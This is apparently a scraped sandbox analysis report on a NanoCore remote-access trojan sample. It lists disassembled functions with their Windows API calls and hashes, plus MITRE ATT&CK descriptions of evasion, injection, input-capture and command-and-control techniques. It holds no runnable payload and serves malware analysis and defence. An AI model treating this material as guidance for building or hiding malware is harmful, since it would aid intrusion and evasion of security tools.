Instruction Fuzzy Hash: 5B11F2B6900259DFDB10CFAAC444BDEBBF4EB48314F14842EE515A7600C3B5A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01229849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012296A9,00000800,00000000,00000000), ref: 012298BA

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3c787aa422eabd6f70550b7e2b9a11debfd18e575c1f2802c20e9ada9d8d923f
Instruction ID: a7d3b9429dc6f2123dc534c7fa99083804101a27d0481935d3b3eee878a4e808
Opcode Fuzzy Hash: 3c787aa422eabd6f70550b7e2b9a11debfd18e575c1f2802c20e9ada9d8d923f
Instruction Fuzzy Hash: 621103B6D00219DFDB10CFAAC544BDEBBF4EB48314F14842ED515A7610C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012295C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0122962E

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 80a84c9d39a3f7948ac164f52b99dcb2ce9a7e8187d833ce10ebac711188267e
Instruction ID: 4ca3ffdd517a8f02f43c05d23436273f65d76f0b4382bb018810155dfc8a74c7
Opcode Fuzzy Hash: 80a84c9d39a3f7948ac164f52b99dcb2ce9a7e8187d833ce10ebac711188267e
Instruction Fuzzy Hash: 241102B5C002598FDB20CF9AC444BDEFBF4AB88324F14841AD519A7610C374A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0122FE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0122FE9D

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a13b7bfa2235948087d58e34a8fd04eac355acb08c3df89264ae7fd6cf5d612e
Instruction ID: dce1a5f2a4071f3be5cdfd2ab97c9c626a75d84c2946ff63bf437f9112f5e6ed
Opcode Fuzzy Hash: a13b7bfa2235948087d58e34a8fd04eac355acb08c3df89264ae7fd6cf5d612e
Instruction Fuzzy Hash: D71103B5900249DFDB10CFA9D584BDEBBF8FB48324F24851AE954B7600C375A945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0122FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0122FE9D

Memory Dump Source

Source File: 00000019.00000002.404160914.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ea3ded581030e4254da0c77df4f2de851663b6a33cc42d381737dd6d7d78e058
Instruction ID: c5d82d0b07fb07b96b4cbd390ae4a6a52e54e339acd3d011d54079d3fdb420ac
Opcode Fuzzy Hash: ea3ded581030e4254da0c77df4f2de851663b6a33cc42d381737dd6d7d78e058
Instruction Fuzzy Hash: 391112B58002499FDB10DF9AD584BDEFBF8EB48324F20841AE914A7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6732 Parent PID: 6304 dhcpmon.exeCOMMON

Executed Functions

Function 0228B6C0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0228B730
GetCurrentThread.KERNEL32 ref: 0228B76D
GetCurrentProcess.KERNEL32 ref: 0228B7AA
GetCurrentThreadId.KERNEL32 ref: 0228B803

Strings

xt, xrefs: 0228B82F

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: xt
API String ID: 2063062207-1235079552
Opcode ID: 8256fd7b89730340cdcbf395bcc9cd317a125a2a8286c1f27b3b52d9b0bd5ee9
Instruction ID: eb890b56d5f3b749dcdb1892e632c75d8f5ce96fb7517e4c4843e6560c709e68
Opcode Fuzzy Hash: 8256fd7b89730340cdcbf395bcc9cd317a125a2a8286c1f27b3b52d9b0bd5ee9
Instruction Fuzzy Hash: B45165B59113458FDB54CFA9D548BEEBBF1AF48308F20885EE009A72A0D774A884CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0228B6D0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0228B730
GetCurrentThread.KERNEL32 ref: 0228B76D
GetCurrentProcess.KERNEL32 ref: 0228B7AA
GetCurrentThreadId.KERNEL32 ref: 0228B803

Strings

xt, xrefs: 0228B82F

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: xt
API String ID: 2063062207-1235079552
Opcode ID: 82594da12ade8479f9e2e6efde94a632bf81729ea2fd2a0ea052e95303188ea8
Instruction ID: 227e439113a9ae0de7e7f391f35b32a83bf265ebf15df4a5b739bef260b238a7
Opcode Fuzzy Hash: 82594da12ade8479f9e2e6efde94a632bf81729ea2fd2a0ea052e95303188ea8
Instruction Fuzzy Hash: 145154B09113498FDB54CFA9D548BDEBBF0EF48308F20885EE009A7290C774A884CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 022893E8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0228962E

Strings

HRs, xrefs: 0228958B
HRs, xrefs: 02289566

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: HandleModule
String ID: HRs$HRs
API String ID: 4139908857-98839746
Opcode ID: 7222dc87bf66c2c8275c24126fbfbfa37cf678e9a77a30068f7f4ac82a417c83
Instruction ID: 36e96419a3f96abc217b9e1989e1072fb86dea9de40222d68fe14a3b899419b2
Opcode Fuzzy Hash: 7222dc87bf66c2c8275c24126fbfbfa37cf678e9a77a30068f7f4ac82a417c83
Instruction Fuzzy Hash: 66712470A11B058FD764DFA9C0447AAB7F5BF88314F008A2ED44AD7B94D734E8858F91

Uniqueness

Uniqueness Score: -1.00%

Function 0228FAA0, Relevance: 1.8, APIs: 1, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4c339451a2dbc8b9667077763613da407ddf22ddb689655cca38963ecf49fd3
Instruction ID: 236bc72b4f9352198f69c2ad903ee618c44c50a87217dd4209b802b1ca341d55
Opcode Fuzzy Hash: c4c339451a2dbc8b9667077763613da407ddf22ddb689655cca38963ecf49fd3
Instruction Fuzzy Hash: 32917DB2C093899FDB12CFA4C890ACDBFB0AF0A314F19819BE544AB1A3D7759545CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0228FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0228FD0A

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 202306d05cac301d0cd87299e446aae143c63fa65123045990a5b1ac651f41a8
Instruction ID: 7dad1c20c988ba005e5b6613a5a23763d095fb4867abc647450b9788ea333234
Opcode Fuzzy Hash: 202306d05cac301d0cd87299e446aae143c63fa65123045990a5b1ac651f41a8
Instruction Fuzzy Hash: DC4101B1D103099FDB14CFE9C980ADEBBB5FF88304F64812AE909AB250D7719885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0228BDC1, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0228BD87

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 246c703862a8be04359300c8e0956657b6f5e884a100ae929f1f290e983a191f
Instruction ID: 9d8d4651ae64b07cf34c67f2809012d42d07eb81431faf5206e7837bdce406e7
Opcode Fuzzy Hash: 246c703862a8be04359300c8e0956657b6f5e884a100ae929f1f290e983a191f
Instruction Fuzzy Hash: C2416EB5A40645DFE701DFA0E98CBBA7BB9FB48300F148929EA018B795CB385C00CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0228BCF9, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0228BD87

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 536619d1d2b8b8ae699a2cbdefa3fb18d7356541ef5d73358f13bc24dbb71d7f
Instruction ID: 960a433b78ce1d76e2c181fcc27d3db638c9cfdc95a3574f5980d57ed7fc96f5
Opcode Fuzzy Hash: 536619d1d2b8b8ae699a2cbdefa3fb18d7356541ef5d73358f13bc24dbb71d7f
Instruction Fuzzy Hash: 0F2103B5901249AFDB10CFAAD584AEEBFF4EB48324F14841AE954A7250D378A944DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0228BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0228BD87

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ece37a38829336ff14d478591ada308c3f0dd2e281331ba727bfdadc8f1a873a
Instruction ID: 9ab3041a135f8fc3fdccc86bb9892a65873c5f39d0320a90417fcc653dfb3cc2
Opcode Fuzzy Hash: ece37a38829336ff14d478591ada308c3f0dd2e281331ba727bfdadc8f1a873a
Instruction Fuzzy Hash: C621E4B5901249AFDB10CFAAD584ADEBBF8FB48324F14841AE914A7350D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02288768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022896A9,00000800,00000000,00000000), ref: 022898BA

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7f96a31bb4aced7df08d7aab0813cd09caacfc05d7f4a27381bfaba531456d14
Instruction ID: 1f507bcbd1e77afe58b8da5244c661d7b941561c3b0637b90324c9f6a4cf25e5
Opcode Fuzzy Hash: 7f96a31bb4aced7df08d7aab0813cd09caacfc05d7f4a27381bfaba531456d14
Instruction Fuzzy Hash: D711F4B6D0024A8FDB10DF9AC444AEEBBF4EB48314F14842ED515A7740C375A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02289849, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022896A9,00000800,00000000,00000000), ref: 022898BA

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9de26ff1eae0e147737fd9b33dbb3a90b8f75a84c5a8fb04e2547e8116e2d20a
Instruction ID: a1ddc58e48c38064f0760af37839577a1406002712eaf143e84d1a317de86b48
Opcode Fuzzy Hash: 9de26ff1eae0e147737fd9b33dbb3a90b8f75a84c5a8fb04e2547e8116e2d20a
Instruction Fuzzy Hash: 3A1100B6D0034A8FDB10DFAAD444BEEBBF4AB88314F14882ED555A7640C379A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022895C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0228962E

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5aecc1cd6bfa5cef49e1633608ae29d26e7483babac9cb43b2facc205033cf7a
Instruction ID: a64804d3e4a002837f90e3cfbab6aa8f4242e13dde833b0f7891642bff8849b5
Opcode Fuzzy Hash: 5aecc1cd6bfa5cef49e1633608ae29d26e7483babac9cb43b2facc205033cf7a
Instruction Fuzzy Hash: EB110FB2D002598FCB10DF9AC444BDEFBF4AF88324F14842AD829A7640C375A585CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0228FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0228FE9D

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 27236e31da9bdb025c145e8aa900574c35ded3e7350090adfed67be6703e0ae6
Instruction ID: 7a7a1d7e8c47f4ab83657380d081377304f8961cd7276ee9c8706e8b8f757962
Opcode Fuzzy Hash: 27236e31da9bdb025c145e8aa900574c35ded3e7350090adfed67be6703e0ae6
Instruction Fuzzy Hash: 7D1103B59002498FDB10DF9AD584BDEBBF8EB48324F20841AD919A7640C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0228FE38, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0228FE9D

Memory Dump Source

Source File: 0000001A.00000002.419265282.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 90702e47f05fefc662476ff9abf18fcc9da2d844b1399e859773b362c477274c
Instruction ID: c569c1024e0af1d0b1259ddbac69124937cde82913c8a2ab1d072f4e3fab1144
Opcode Fuzzy Hash: 90702e47f05fefc662476ff9abf18fcc9da2d844b1399e859773b362c477274c
Instruction Fuzzy Hash: 001122B6D00249CFDB10CF99D584BEEBBF8EB48324F20845AD958A7641C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0073D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.415927906.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ac2e3ad9519f18c6aa91f251761657d2f678873d628bff9a40c047a5b043db
Instruction ID: 6ca03a4a158fb0c1cb564cba96dff39667617916c64b1c166f392f227efda10e
Opcode Fuzzy Hash: f1ac2e3ad9519f18c6aa91f251761657d2f678873d628bff9a40c047a5b043db
Instruction Fuzzy Hash: 6B2125B1604300DFEB28CF60E4C4B16BBA5FB88714F24C969D8490B247C33ADC07CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0073D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.415927906.000000000073D000.00000040.00000001.sdmp, Offset: 0073D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33f90ffacf4ca246df573ab4cee07c8edbfb02e83be3fd07da9df21e3ad87c3
Instruction ID: 8f103c715a6fb149c8e2ce79ced40d7fad336ae5d963f9a7655f8195dab86eac
Opcode Fuzzy Hash: a33f90ffacf4ca246df573ab4cee07c8edbfb02e83be3fd07da9df21e3ad87c3
Instruction Fuzzy Hash: 7D11BE75504280CFDB15CF10E5C4B15BBA1FB44714F24C6A9D8494B656C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report LFEs2N6DU4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre